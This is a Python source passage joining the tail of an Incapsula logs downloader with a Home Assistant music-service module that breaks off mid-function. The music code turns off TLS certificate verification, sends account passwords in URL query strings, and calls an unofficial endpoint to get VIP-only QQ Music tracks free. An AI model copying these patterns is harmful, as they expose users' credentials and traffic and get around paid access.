self.logger.info("Sleeping for 30 seconds before trying to fetch logs again...")
time.sleep(30)
continue
# the is a last downloaded log file id
else:
self.logger.debug("The last known downloaded file is %s", last_log_id)
# get the next log file name that we should download
next_file = self.last_known_downloaded_file_id.get_next_file_name()
self.logger.debug("Will now try to download %s", next_file)
try:
# download and handle the next log file
success = self.handle_file(next_file)
# if we successfully handled the next log file
if success:
self.logger.debug("Successfully handled file %s, updating the last known downloaded file id", next_file)
# set the last handled log file information
self.last_known_downloaded_file_id.move_to_next_file()
if self.running:
self.logger.info("Sleeping for 2 seconds before fetching the next logs file")
retries = 0
time.sleep(2)
# we failed to handle the next log file
else:
self.logger.info("Could not get log file %s. It could be that the log file does not exist yet.", next_file)
if self.running:
if retries >= 10:
self.logger.info("Failed to download file 10 times, trying to recover.")
# download the logs.index file
self.logs_file_index.download()
logs_in_index = self.logs_file_index.indexed_logs()
log_id = self.get_counter_from_file_name(next_file)
first_log_id_in_index = self.get_counter_from_file_name(logs_in_index[0])
if log_id < first_log_id_in_index:
self.logger.error("Current downloaded file is not in the index file any more. This is probably due to a long delay in downloading. Attempting to recover")
self.last_known_downloaded_file_id.remove_last_log_id()
elif self.last_known_downloaded_file_id.get_next_file_name(skip_files=1) in logs_in_index:
self.logger.warning("Skipping " + next_file)
self.last_known_downloaded_file_id.move_to_next_file()
else:
self.logger.info("Next file still does not exist. Sleeping for 30 seconds and continuing normally")
retries = 0
time.sleep(30)
else:
# wait for 30 seconds between each iteration
self.logger.info("Sleeping for 30 seconds before trying to fetch logs again...")
retries += 1
time.sleep(30)
except Exception as e:
self.logger.error("Failed to download file %s. Error is - %s , %s", next_file, e, traceback.format_exc())
"""
Scan the logs.index file, and download all the log files in it
"""
def first_time_scan(self):
self.logger.info("No last index found, will now scan the entire index...")
# get the list of file names from the index file
logs_in_index = self.logs_file_index.indexed_logs()
# for each file
for log_file_name in logs_in_index:
if self.running:
if LogsFileIndex.validate_log_file_format(str(log_file_name.rstrip('\r\n'))):
# download and handle the log file
success = self.handle_file(log_file_name)
# if we successfully handled the log file
if success:
# set the last handled log file information
self.last_known_downloaded_file_id.update_last_log_id(log_file_name)
else:
# skip the file and try to get the next one
self.logger.warning("Skipping File %s", log_file_name)
self.logger.info("Completed fetching all the files from the logs files index file")
"""
Download a log file, decrypt, unzip, and store it
"""
def handle_file(self, logfile, wait_time=5):
# we will try to get the file a max of 3 tries
counter = 0
while counter <= 3:
if self.running:
# download the file
result = self.download_log_file(logfile)
# if we got it
if result[0] == "OK":
try:
# we decrypt the file
decrypted_file = self.decrypt_file(result[1], logfile)
# handle the decrypted content
self.handle_log_decrypted_content(logfile, decrypted_file)
self.logger.info("File %s download and processing completed successfully", logfile)
return True
# if an exception occurs during the decryption or handling the decrypted content,
# we save the raw file to a "fail" folder
except Exception as e:
self.logger.info("Saving file %s locally to the 'fail' folder %s %s", logfile, e, traceback.format_exc())
fail_dir = os.path.join(self.config.PROCESS_DIR, 'fail')
if not os.path.exists(fail_dir):
os.mkdir(fail_dir)
with open(os.path.join(fail_dir, logfile), "w") as file:
file.write(result[1])
self.logger.info("Saved file %s locally to the 'fail' folder", logfile)
break
# if the file is not found (could be that it is not generated yet)
elif result[0] == "NOT_FOUND" or result[0] == "ERROR":
# we increase the retry counter
counter += 1
# if we want to sleep between retries
if wait_time > 0 and counter <= 3:
if self.running:
self.logger.info("Sleeping for %s seconds until next file download retry number %s out of 3", wait_time, counter)
time.sleep(wait_time)
# if the downloader was stopped
else:
return False
# if we didn't succeed to download the file
return False
"""
Saves the decrypted file content to a log file in the filesystem
"""
def handle_log_decrypted_content(self, filename, decrypted_file):
decrypted_file = decrypted_file.decode('utf-8')
if self.config.SYSLOG_ENABLE == 'YES':
syslogger = logging.getLogger("syslog")
syslogger.setLevel(logging.INFO)
if self.config.SYSLOG_PROTO == 'TCP':
self.logger.info('Syslog enabled, using TCP')
syslog = logging.handlers.SysLogHandler(address=(self.config.SYSLOG_ADDRESS, int(self.config.SYSLOG_PORT)), socktype=socket.SOCK_STREAM)
else:
self.logger.info('Syslog enabled, using UDP')
syslog = logging.handlers.SysLogHandler(address=(self.config.SYSLOG_ADDRESS, int(self.config.SYSLOG_PORT)))
syslogger.addHandler(syslog)
for msg in decrypted_file.splitlines():
if msg != '':
try:
syslogger.info(msg)
except:
self.logger.error('Error sending log file to syslog server %s on port %s via protocol %s', self.config.SYSLOG_ADDRESS, self.config.SYSLOG_PORT, self.config.SYSLOG_PROTO)
if self.config.SAVE_LOCALLY == "YES":
local_file = open(self.config.PROCESS_DIR + filename, "a+")
local_file.writelines(decrypted_file)
"""
Decrypt a file content
"""
def decrypt_file(self, file_content, filename):
# each log file is built from a header section and a content section, the two are divided by a |==| mark
file_split_content = file_content.split(b"|==|\n")
# get the header section content
file_header_content = file_split_content[0].decode('utf-8')
# get the log section content
file_log_content = file_split_content[1]
# if the file is not encrypted - the "key" value in the file header is '-1'
file_encryption_key = file_header_content.find("key:")
if file_encryption_key == -1:
# uncompress the log content
uncompressed_and_decrypted_file_content = zlib.decompressobj().decompress(file_log_content)
# if the file is encrypted
else:
content_encrypted_sym_key = file_header_content.split("key:")[1].splitlines()[0]
# we expect to have a 'keys' folder that will have the stored private keys
self.logger.warning('Keys Dir: %s', os.path.join(self.config_path, "keys"))
if not os.path.exists(os.path.join(self.config_path, "keys")):
self.logger.error("No encryption keys directory was found and file %s is encrypted", filename)
raise Exception("No encryption keys directory was found")
# get the public key id from the log file header
public_key_id = file_header_content.split("publicKeyId:")[1].splitlines()[0]
# get the public key directory in the filesystem - each time we upload a new key this id is incremented
public_key_directory = os.path.join(os.path.join(self.config_path, "keys"), public_key_id)
# if the key directory does not exists
if not os.path.exists(public_key_directory):
self.logger.error("Failed to find a proper certificate for : %s who has the publicKeyId of %s", filename, public_key_id)
raise Exception("Failed to find a proper certificate")
# get the checksum
checksum = file_header_content.split("checksum:")[1].splitlines()[0]
# get the private key
private_key = bytes(open(os.path.join(public_key_directory, "Private.key"), "r").read(), 'utf-8')
try:
rsa_private_key = M2Crypto.RSA.load_key_string(private_key)
content_decrypted_sym_key = rsa_private_key.private_decrypt(base64.b64decode(bytes(content_encrypted_sym_key, 'utf-8')), M2Crypto.RSA.pkcs1_padding)
uncompressed_and_decrypted_file_content = zlib.decompressobj().decompress(AES.new(base64.b64decode(bytearray(content_decrypted_sym_key)), AES.MODE_CBC, 16 * "\x00").decrypt(file_log_content))
# we check the content validity by checking the checksum
content_is_valid = self.validate_checksum(checksum, uncompressed_and_decrypted_file_content)
if not content_is_valid:
self.logger.error("Checksum verification failed for file %s", filename)
raise Exception("Checksum verification failed")
except Exception as e:
self.logger.error("Error while trying to decrypt the file %s: %s", filename, e)
raise Exception("Error while trying to decrypt the file" + filename)
return uncompressed_and_decrypted_file_content
"""
Downloads a log file
"""
def download_log_file(self, filename):
# get the file name
filename = str(filename.rstrip("\r\n"))
try:
# download the file
file_content = self.file_downloader.request_file_content(self.config.BASE_URL + filename)
# if we received a valid file content
if file_content != "":
return "OK", file_content
# if the file was not found
else:
return "NOT_FOUND", file_content
except Exception:
self.logger.error("Error while trying to download file")
return "ERROR"
"""
Validates a checksum
"""
@staticmethod
def validate_checksum(checksum, uncompressed_and_decrypted_file_content):
m = hashlib.md5()
m.update(uncompressed_and_decrypted_file_content)
if m.hexdigest() == checksum:
return True
else:
return False
"""
Handle a case of process termination
"""
def set_signal_handling(self, sig, frame):
if sig == signal.SIGTERM:
self.running = False
self.logger.info("Got a termination signal, will now shutdown and exit gracefully")
"""
Gets the next log file name that we should download
"""
def get_counter_from_file_name(self, file_name):
curr_log_file_name_arr = file_name.split("_")
return int(curr_log_file_name_arr[1].rstrip(".log"))
"""
****************************************************************
Helper Classes
****************************************************************
"""
"""
LastFileId - A class for managing the last known successfully downloaded log file
"""
class LastFileId:
def __init__(self, config_path):
self.config_path = config_path
"""
Gets the last known successfully downloaded log file id
"""
def get_last_log_id(self):
# gets the LastKnownDownloadedFileId file
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
# if the file exists - get the log file id from it
if os.path.exists(index_file_path):
with open(index_file_path, "r+") as index_file:
return index_file.read()
# return an empty string if no file exists
return ''
"""
Update the last known successfully downloaded log file id
"""
def update_last_log_id(self, last_id):
# gets the LastKnownDownloadedFileId file
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
with open(index_file_path, "w") as index_file:
# update the id
index_file.write(last_id)
index_file.close()
"""
Remove the LastKnownDownloadedFileId.txt file. Used to skip missing files.
"""
def remove_last_log_id(self):
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
if os.path.exists(index_file_path):
os.remove(index_file_path)
"""
Gets the next log file name that we should download
"""
def get_next_file_name(self, skip_files=0):
# get the current stored last known successfully downloaded log file
curr_log_file_name_arr = self.get_last_log_id().split("_")
# get the current id
curr_log_file_id = int(curr_log_file_name_arr[1].rstrip(".log")) + 1 + skip_files
# build the next log file name
new_log_file_id = curr_log_file_name_arr[0] + "_" + str(curr_log_file_id) + ".log"
return new_log_file_id
"""
Increment the last known successfully downloaded log file id
"""
def move_to_next_file(self):
self.update_last_log_id(self.get_next_file_name())
"""
LogsFileIndex - A class for managing the logs files index file
"""
class LogsFileIndex:
def __init__(self, config, logger, downloader):
self.config = config
self.content = None
self.hash_content = None
self.logger = logger
self.file_downloader = downloader
"""
Gets the indexed log files
"""
def indexed_logs(self):
return self.content
"""
Downloads a logs file index file
"""
def download(self):
self.logger.info("Downloading logs index file...")
# try to get the logs.index file
file_content = self.file_downloader.request_file_content(self.config.BASE_URL + "logs.index")
# if we got the file content
if file_content != "":
content = file_content.decode("utf-8")
# validate the file format
if LogsFileIndex.validate_logs_index_file_format(content):
self.content = content.splitlines()
self.hash_content = set(self.content)
else:
self.logger.error("log.index, Pattern Validation Failed")
raise Exception
else:
raise Exception('Index file does not yet exist, please allow time for files to be generated.')
"""
Validates that format name of the logs files inside the logs index file
"""
@staticmethod
def validate_logs_index_file_format(content):
file_rex = re.compile("(\d+_\d+\.log\n)+")
if file_rex.match(content):
return True
return False
"""
Validates a log file name format
"""
@staticmethod
def validate_log_file_format(content):
file_rex = re.compile("(\d+_\d+\.log)")
if file_rex.match(content):
return True
return False
"""
Config - A class for reading the configuration file
"""
class Config:
def __init__(self, config_path, logger):
self.config_path = config_path
self.logger = logger
"""
Reads the configuration file
"""
def read(self):
config_file = os.path.join(self.config_path, "Settings.Config")
if os.path.exists(config_file):
config_parser = configparser.ConfigParser()
config_parser.read(config_file)
config = Config(self.config_path, self.logger)
# Check for environment variables first, then load config values. Backwards compatibility with non-docker deployments
config.API_ID = os.environ.get('IMPERVA_API_ID', config_parser.get("SETTINGS", "APIID"))
config.API_KEY = os.environ.get('IMPERVA_API_KEY', config_parser.get("SETTINGS", "APIKEY"))
config.PROCESS_DIR = os.environ.get('IMPERVA_LOG_DIRECTORY', os.path.join(config_parser.get("SETTINGS", "PROCESS_DIR"), ""))
config.BASE_URL = os.environ.get('IMPERVA_API_URL', os.path.join(config_parser.get("SETTINGS", "BASEURL"), ""))
config.SAVE_LOCALLY = os.environ.get('IMPERVA_SAVE_LOCALLY', config_parser.get("SETTINGS", "SAVE_LOCALLY"))
config.USE_PROXY = os.environ.get('IMPERVA_USE_PROXY', config_parser.get("SETTINGS", "USEPROXY"))
config.PROXY_SERVER = os.environ.get('IMPERVA_PROXY_SERVER', config_parser.get("SETTINGS", "PROXYSERVER"))
config.SYSLOG_ENABLE = os.environ.get('IMPERVA_SYSLOG_ENABLE', config_parser.get('SETTINGS', 'SYSLOG_ENABLE'))
config.SYSLOG_ADDRESS = os.environ.get('IMPERVA_SYSLOG_ADDRESS', config_parser.get('SETTINGS', 'SYSLOG_ADDRESS'))
config.SYSLOG_PORT = os.environ.get('IMPERVA_SYSLOG_PORT', config_parser.get('SETTINGS', 'SYSLOG_PORT'))
config.SYSLOG_PROTO = os.environ.get('IMPERVA_SYSLOG_PROTO', config_parser.get('SETTINGS','SYSLOG_PROTO'))
config.USE_CUSTOM_CA_FILE = os.environ.get('IMPERVA_USE_CUSTOM_CA_FILE', config_parser.get('SETTINGS', 'USE_CUSTOM_CA_FILE'))
config.CUSTOM_CA_FILE = os.environ.get('IMPERVA_CUSTOM_CA_FILE', config_parser.get('SETTINGS', 'CUSTOM_CA_FILE'))
return config
else:
self.logger.error("Could Not find configuration file %s", config_file)
raise Exception("Could Not find configuration file")
"""
FileDownloader - A class for downloading files
"""
class FileDownloader:
def __init__(self, config, logger):
self.config = config
self.logger = logger
"""
A method for getting a destination URL file content
"""
def request_file_content(self, url, timeout=20):
# default value
response_content = ""
#https://github.com/imperva/incapsula-logs-downloader/pull/7
if self.config.USE_PROXY == "YES" and self.config.USE_CUSTOM_CA_FILE == "YES":
self.logger.info("Using proxy %s" % self.config.PROXY_SERVER)
https = urllib3.ProxyManager(self.config.PROXY_SERVER, ca_certs=self.config.CUSTOM_CA_FILE, cert_reqs='CERT_REQUIRED', timeout=timeout)
elif self.config.USE_PROXY == "YES" and self.config.USE_CUSTOM_CA_FILE == "NO":
self.logger.info("Using proxy %s" % self.config.PROXY_SERVER)
https = urllib3.ProxyManager(self.config.PROXY_SERVER, cert_reqs='CERT_REQUIRED', timeout=timeout)
elif self.config.USE_PROXY == "NO" and self.config.USE_CUSTOM_CA_FILE == "YES":
https = urllib3.PoolManager(ca_certs=self.config.CUSTOM_CA_FILE, cert_reqs='CERT_REQUIRED', timeout=timeout)
else: # no proxy and no custom CA file
https = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', timeout=timeout)
try:
#Download the file
auth_header = urllib3.make_headers(basic_auth='%s:%s' % (self.config.API_ID, self.config.API_KEY))
response = https.request('GET', url, headers=auth_header)
# if we get a 200 OK response
if response.status == 200:
self.logger.info("Successfully downloaded file from URL %s" % url)
# read the response content
response_content = response.data
# if we get another response code
elif response.status == 404:
self.logger.warning("Could not find file %s. Response code is %s", url, response.status)
return response_content
elif response.status == 401:
self.logger.error("Authorization error - Failed to download file %s. Response code is %s", url, response.status)
raise Exception("Authorization error")
elif response.status == 429:
self.logger.error("Rate limit exceeded - Failed to download file %s. Response code is %s", url, response.status)
raise Exception("Rate limit error")
else:
self.logger.error("Failed to download file %s. Response code is %s. Data is %s", url, response.status, response.data)
# close the response
response.close()
# return the content string
return response_content
except urllib3.exceptions.HTTPError as e:
print('Request failed:', e)
self.logger.error("An error has occur while making a open connection to %s. %s", url, str(e.reason))
raise Exception("Connection error")
# unexpected exception occurred
except Exception:
self.logger.error("An error has occur while making a open connection to %s. %s", url, traceback.format_exc())
raise Exception("Connection error")
if __name__ == "__main__":
# default paths
path_to_config_folder = "/etc/incapsula/logs/config"
path_to_system_logs_folder = "/var/log/incapsula/logsDownloader/"
# default log level
system_logs_level = "INFO"
# read arguments
try:
opts, args = getopt.getopt(sys.argv[1:], 'c:l:v:h', ['configpath=', 'logpath=', 'loglevel=', 'help'])
except getopt.GetoptError:
print("Error starting Logs Downloader. The following arguments should be provided:" \
" \n '-c' - path to the config folder" \
" \n '-l' - path to the system logs folder" \
" \n '-v' - LogsDownloader system logs level" \
" \n Or no arguments at all in order to use default paths")
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print('LogsDownloader.py -c <path_to_config_folder> -l <path_to_system_logs_folder> -v <system_logs_level>')
sys.exit(2)
elif opt in ('-c', '--configpath'):
path_to_config_folder = arg
elif opt in ('-l', '--logpath'):
path_to_system_logs_folder = arg
elif opt in ('-v', '--loglevel'):
system_logs_level = arg.upper()
if system_logs_level not in ["DEBUG", "INFO", "ERROR"]:
sys.exit("Provided system logs level is not supported. Supported levels are DEBUG, INFO and ERROR")
# init the LogsDownloader
logsDownloader = LogsDownloader(path_to_config_folder, path_to_system_logs_folder, system_logs_level)
# set a handler for process termination
signal.signal(signal.SIGTERM, logsDownloader.set_signal_handling)
try:
# start a dedicated thread that will run the LogsDownloader logs fetching logic
process_thread = threading.Thread(target=logsDownloader.get_log_files, name="process_thread")
# start the thread
process_thread.start()
while logsDownloader.running:
time.sleep(1)
process_thread.join(1)
except Exception:
sys.exit("Error starting Logs Downloader - %s" % traceback.format_exc())
|
api_music.py | import aiohttp, json, re, os, uuid, math, urllib, threading, re
import http.cookiejar as HC
from .shaonianzhentan import fetch_info
from homeassistant.helpers.network import get_url
# 全局请求头
HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}
# 模拟MAC环境
COOKIES = {'os': 'osx'}
# 乐听头条配置
UID = str(uuid.uuid4()).replace('-','')
class ApiMusic():
def __init__(self, media, config):
self.hass = media._hass
self.media = media
# 网易云音乐接口地址
self.api_url = config.get("api_url", '').strip('/')
self.qq_api_url = config.get('qq_api_url', '').strip('/')
self.xmly_api_url = config.get('xmly_api_url', '').strip('/')
# 网易云音乐用户ID
self.uid = str(config.get("uid", ''))
# 用户名和密码
self.user = str(config.get("user", ''))
self.password = str(config.get("password", ''))
async def login(self):
# 如果有用户名密码,则登录
if self.user != '' and self.password != '':
self.log('登录操作', '开始登录')
# 判断是否使用邮箱
if '@' in self.user:
# 邮箱登录
res = await self.get('/login?email=' + self.user + '&password=' + self.password)
else:
# 手机号码登录
res = await self.get('/login/cellphone?phone=' + self.user + '&password=' + self.password)
# 登录成功
if res is not None and res['code'] == 200:
self.uid = str(res['account']['id'])
self.log('登录成功')
else:
self.media.notify("网易云登录失败,请检查账号密码是否错误。如果确定没错,请检查接口是否正常。", "error")
self.log('登录失败', res)
def log(self, name, value = ''):
self.media.log('【ApiMusic接口】%s:%s',name,value)
async def get(self, url):
link = self.api_url + url
# 不是登录请求,则显示出来(这里保护登录信息)
if '/login' not in url:
print(link)
result = None
try:
global COOKIES
jar = aiohttp.CookieJar(unsafe=True)
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(headers=HEADERS, cookies=COOKIES, cookie_jar=jar, connector=connector) as session:
async with session.get(link) as resp:
# 如果是登录,则将登录状态保存起来
if '/login' in url:
_dict = {}
cookies = session.cookie_jar.filter_cookies(self.api_url)
for key, cookie in cookies.items():
_dict[key] = cookie.value
# print(key)
# print(cookie.value)
# 设置全局cookies值
COOKIES = _dict
result = await resp.json()
except Exception as e:
self.media.notify('接口出现异常,请确定音乐接口服务是否正常运行', "error")
self.log('【接口出现异常】' + link, e)
return result
async def proxy_get(self, url):
print(url)
result = None
try:
headers = {'Referer': url}
headers.update(HEADERS)
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(headers=headers, connector=connector) as session:
async with session.get(url) as resp:
# 喜马拉雅返回的是文本内容
if 'https://mobile.ximalaya.com/mobile/' in url:
result = json.loads(await resp.text())
else:
result = await resp.json()
except Exception as e:
self.log('【接口出现异常】' + url, e)
return result
# QQ音乐
async def qq_get(self, url):
if self.qq_api_url != '':
res = await self.proxy_get(self.qq_api_url + url)
if res is not None and res['response']["code"] == 0:
return res['response']
###################### 获取音乐播放URL ######################
async def get_http_code(self, url):
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(connector=connector) as session:
async with session.get(url) as response:
return response.status
# 获取音乐URL
async def get_song_url(self, id):
obj = await self.get("/song/url?id=" + str(id))
return obj['data'][0]['url']
# 获取QQ音乐URL
async def get_qq_song_url(self, id):
res = await self.qq_get("/getMusicVKey?songmid=" + str(id))
if res is not None and len(res['playLists']) > 0:
url = res['playLists'][0]
http_code = await self.get_http_code(url)
if http_code == 403:
self.media.notify("😂只有尊贵的QQ音乐绿砖会员才能收听", "error")
return None
# 如果没有权限,说明这个只有尊贵的QQ音乐绿砖会员才能收听
# 我木有钱,只想白嫖,所以调用这位老哥的开放接口
vip_url = 'https://api.qq.jsososo.com/song/url?id=' + str(id)
print(f"使用白嫖接口:{vip_url}")
res = await self.proxy_get(vip_url)
return res['data']
return url
# 获取重写向后的地址
async def get_redirect_url(self, url):
# 请求网页
res = await fetch_info(url)
result_url = res['url']
if result_url == 'https://music.163.com/404':
return None
return result_url
# 进行咪咕搜索,可以播放周杰伦的歌歌
async def migu_search(self, songName, singerName):
try:
# 如果含有特殊字符,则直接使用名称搜索
searchObj = re.search(r'\(|(|:|:《', songName, re.M|re.I)
if searchObj:
keywords = songName
else:
keywords = songName + ' - '+ singerName
res = await self.proxy_get("http://m.music.migu.cn/migu/remoting/scr_search_tag?rows=10&type=2&keyword=" + urllib.parse.quote(keywords) + "&pgc=1")
if 'musics' in res and len(res['musics']) > 0 and (songName in res['musics'][0]['songName'] or searchObj):
return res['musics'][0]['mp3']
except Exception as e:
print("在咪咕搜索时出现错误:", e)
return None
###################### 获取音乐播放URL ######################
###################### 搜索音乐列表 ######################
async def search_migu(self, name, rows = 10):
res = await self.proxy_get("http://m.music.migu.cn/migu/remoting/scr_search_tag?rows=" + str(rows)+ "&type=2&keyword=" + urllib.parse.quote(name) + "&pgc=1")
if res is not None:
songs = res['musics']
if res['pgt'] > 0:
_newlist = map(lambda item: {
"search_source": "咪咕音乐",
"id": int(item['id']),
"name": item['songName'],
"album": item['albumName'],
"image": item['cover'] != 'null' and item['cover'] or 'https://m.music.migu.cn/migu/fs/media/p/149/163/5129/image/20171120/1332871.jpg',
"duration": 0,
"url": item['mp3'],
"song": item['songName'],
"singer": item['singerName']
}, songs)
return list(_newlist)
# 音乐搜索
async def search_music(self, name):
_list = []
# 搜索网易云音乐
obj = await self.get('/search?keywords='+ name)
if obj['code'] == 200:
songs = obj['result']['songs']
if len(songs) > 0:
_newlist = map(lambda item: {
"search_source": "网易云音乐",
"id": int(item['id']),
"name": item['name'],
"album": item['album']['name'],
"image": item['album']['artist']['img1v1Url']+"?param=300y300",
"duration": int(item['duration']) / 1000,
"url": "https://music.163.com/song/media/outer/url?id=" + str(item['id']) + ".mp3",
"song": item['name'],
"singer": len(item['artists']) > 0 and item['artists'][0]['name'] or '未知'
}, songs)
_list.extend(list(_newlist))
# 搜索QQ音乐
res = await self.qq_get('/getSmartbox?key=' + name)
if res is not None:
songs = res['data']['song']
if songs['count'] > 0:
_newlist = map(lambda item: {
"search_source": "QQ音乐",
"id": int(item['id']),
"mid": item['mid'],
"name": item['name'],
"album": "QQ音乐",
"image": "http://p3.music.126.net/3TTjFNIrtcUzoMlB1D1fDA==/109951164969055590.jpg?param=300y300",
"duration": 0,
"type": "qq",
"song": item['name'],
"singer": item['singer']
}, songs['itemlist'])
_list.extend(list(_newlist))
# 搜索咪咕音乐
migu_list = await self.search_migu(name)
if migu_list is not None:
_list.extend(migu_list)
return _list
async def search_ximalaya(self, name):
_newlist = []
url = f'https://m.ximalaya.com/m-revision/page/search?kw={name}&core=all&page=1&rows=20'
obj = await self.proxy_get(url)
if obj['ret'] == 0:
artists = obj['data']['albumViews']['albums']
_newlist = list(map(lambda item: {
"id": item['albumInfo']['id'],
"name": item['albumInfo']['title'],
"cover": item['albumInfo'].get('cover_path', 'https://imagev2.xmcdn.com/group79/M02/77/6C/wKgPEF6masWTCICAAAA7qPQDtNY545.jpg!strip=1&quality=7&magick=webp&op_type=5&upload_type=cover&name=web_large&device_type=ios'),
"intro": item['albumInfo']['intro'],
"creator": item['albumInfo']['nickname']
}, artists))
return _newlist
async def search_djradio(self, name):
_newlist = []
obj = await self.get('/search?keywords='+ name +'&type=1009')
if obj['code'] == 200:
artists = obj['result']['djRadios']
_newlist = list(map(lambda item: {
"id": item['id'],
"name": item['name'],
"cover": item['picUrl'],
"intro": item['dj']['signature'],
"creator": item['dj']['nickname']
}, artists))
return _newlist
async def search_playlist(self, name):
_newlist = []
obj = await self.get('/search?keywords='+ name +'&type=1000')
if obj['code'] == 200:
artists = obj['result']['playlists']
_newlist = list(map(lambda item: {
"id": item['id'],
"name": item['name'],
"cover": item['coverImgUrl'],
"intro": item['description'],
"creator": item['creator']['nickname']
}, artists))
return _newlist
###################### 获取音乐列表 ######################
# 获取网易歌单列表
async def music_playlist(self, id):
obj = await self.get('/playlist/detail?id=' + str(id))
if obj['code'] == 200:
trackIds = obj['playlist']['trackIds']
_trackIds = map(lambda item: str(item['id']), trackIds)
_obj = await self.get('/song/detail?ids=' + ','.join(_trackIds))
_list = _obj['songs']
_newlist = map(lambda item: {
"id": int(item['id']),
"name": item['name'],
"album": item['al']['name'],
"image": item['al']['picUrl'],
"duration": int(item['dt']) / 1000,
"url": "https://music.163.com/song/media/outer/url?id=" + str(item['id']) + ".mp3",
"song": item['name'],
"singer": len(item['ar']) > 0 and item['ar'][0]['name'] or '未知'
}, _list)
return {
'name': obj['playlist']['name'],
'list': list(_newlist)
}
else:
return None
# 获取网易电台列表
async def djradio_playlist(self, id, offset, size):
obj = await self.get('/dj/program?rid='+str(id)+'&limit=50&offset='+str(offset * size))
if obj['code'] == 200:
_list = obj['programs']
_totalCount = obj['count']
_newlist = map(lambda item: {
"id": int(item['mainSong']['id']),
"name": item['name'],
"album": item['dj']['brand'],
"image": item['coverUrl'],
"duration": int(item['mainSong']['duration']) / 1000,
"song": item['name'],
"load":{
'id': id,
'type': 'djradio',
'index': offset + 1,
'total': _totalCount
},
"type": "djradio",
"singer": item['dj']['nickname']
}, _list)
return list(_newlist)
else:
return []
# 喜马拉雅播放列表
async def ximalaya_playlist(self, id, index, size=50):
url = 'https://mobile.ximalaya.com/mobile/v1/album/track?albumId=' + str(id) + '&device=android&isAsc=true&pageId=' + str(index) + '&pageSize=' + str(size) +'&statEvent=pageview%2Falbum%40203355&statModule=%E6%9C%80%E5%A4%9A%E6%94%B6%E8%97%8F%E6%A6%9C&statPage=ranklist%40%E6%9C%80%E5%A4%9A%E6%94%B6%E8%97%8F%E6%A6%9C&statPosition=8'
obj = await self.proxy_get(url)
if obj['ret'] == 0:
_list = obj['data']['list']
_totalCount = obj['data']['totalCount']
if len(_list) > 0:
# 获取专辑名称
url = 'http://mobile.ximalaya.com/v1/track/baseInfo?device=android&trackId='+str(_list[0]['trackId'])
_obj = await self.proxy_get(url)
# 格式化列表
_newlist = map(lambda item: {
"id": item['trackId'],
"name": item['title'],
"album": _obj['albumTitle'],
"image": item['coverLarge'],
"duration": item['duration'],
"song": item['title'],
"load":{
'id': id,
'type': 'ximalaya',
'index': index,
'total': _totalCount
},
"type": "xmly",
"url": item['playUrl64'],
"singer": item['nickname']
}, _list)
return list(_newlist)
return []
# 播放专辑
async def play_ximalaya(self, name, number=1):
hass = self.hass
url = 'https://m.ximalaya.com/m-revision/page/search?kw=' + name + '&core=all&page=1&rows=5'
obj = await self.proxy_get(url)
if obj['ret'] == 0:
result = obj['data']['albumViews']
# print(result)
if result['total'] > 0:
albumInfo = result['albums'][0]['albumInfo']
id = albumInfo['id']
print('获取ID:' + str(id))
# 优先获取本地数据
if number == -1:
# 读取本地数据
res = self.media.api_config.get_cache_playlist('ximalaya', id)
if res is not None:
await self.media.play_media('music_playlist', {
'index': res['index'],
'list': res['playlist']
})
return None
number = 1
_newlist = await self.ximalaya_playlist(id, math.ceil(number / 50), 50)
index = number % 50 - 1
if index < 0:
index = 49
# 调用服务,执行播放
if len(_newlist) > 0:
await self.media.play_media('music_playlist', {
'index': index,
'list': _newlist
})
return None
# 获取VIP音频链接
async def get_ximalaya_vip_audio_url(self, id):
if self.xmly_api_url != '':
obj = await self.proxy_get(self.xmly_api_url + "/?id=" + str(id))
if obj is not None and obj['code'] == 0:
return obj['data']
###################### 获取音乐列表 ######################
###################### 播放音乐列表 ######################
# 播放电台
async def play_dj_hotsong(self, name):
hass = self.hass
obj = await self.get('/search?keywords='+ name +'&type=1009')
if obj['code'] == 200:
artists = obj['result']['djRadios']
if len(artists) > 0:
singerId = artists[0]['id']
_newlist = await self.djradio_playlist(singerId, 0, 50)
if len(_newlist) > 0:
# 调用服务,执行播放
await self.media.play_media('music_playlist', list(_newlist))
else:
return None
# 播放歌手的热门歌曲
async def play_singer_hotsong(self, name):
# 周杰伦特殊对待
if name == '周杰伦':
migu_list = await self.search_migu(name, 100)
await self.media.play_media('music_playlist', migu_list)
return None
hass = self.hass
obj = await self.get('/search?keywords='+ name +'&type=100')
if obj['code'] == 200:
artists = obj['result']['artists']
if len(artists) > 0:
singerId = artists[0]['id']
# 获取热门歌曲
hot_obj = await self.get('/artists/top/song?id='+ str(singerId))
if hot_obj['code'] == 200:
_list = hot_obj['hotSongs']
_newlist = map(lambda item: {
"id": int(item['id']),
"name": item['name'],
"album": item['al']['name'],
"image": ('picUrl' in item['al']) and item['al']['picUrl'] or hot_obj['artist']['picUrl'],
"duration": int(item['dt']) / 1000,
"url": "https://music.163.com/song/media/outer/url?id=" + str(item['id']) + ".mp3",
"song": item['name'],
"singer": len(item['ar']) > 0 and item['ar'][0]['name'] or '未知'
}, _list)
# 调用服务,执行播放
await self.media.play_media('music_playlist', list(_newlist))
else:
return None
# 播放音乐
async def play_song(self, name):
_list = await self.search_music(name)
# 调用服务,执行播放
if len(_list) > 0:
await self.media.play_media('music_playlist', _list)
# 播放歌单
async def play_list_hotsong(self, name):
obj = await self.get('/search?keywords='+ name +'&type=1000')
if obj['code'] == 200:
artists = obj['result']['playlists']
if len(artists) > 0:
singerId = artists[0]['id']
obj = await self.music_playlist(singerId)
if obj != None and len(obj['list']) > 0:
_newlist = obj['list']
# 调用服务,执行播放
await self.media.play_media('music_playlist', _newlist)
else:
return None
###################### 播放音乐列表 ######################
###################### 播放新闻 ######################
# 获取新闻
async def _get_news(self, session, leting_headers, catalog_id):
async with session.get('https://app.leting.io/app/url/channel?catalog_id=' + catalog_id + '&size=20&distinct=1&v=v8&channel=xiaomi', headers=leting_headers) as res:
r = await res.json()
_list = r['data']['data']
_newlist = map(lambda item: {
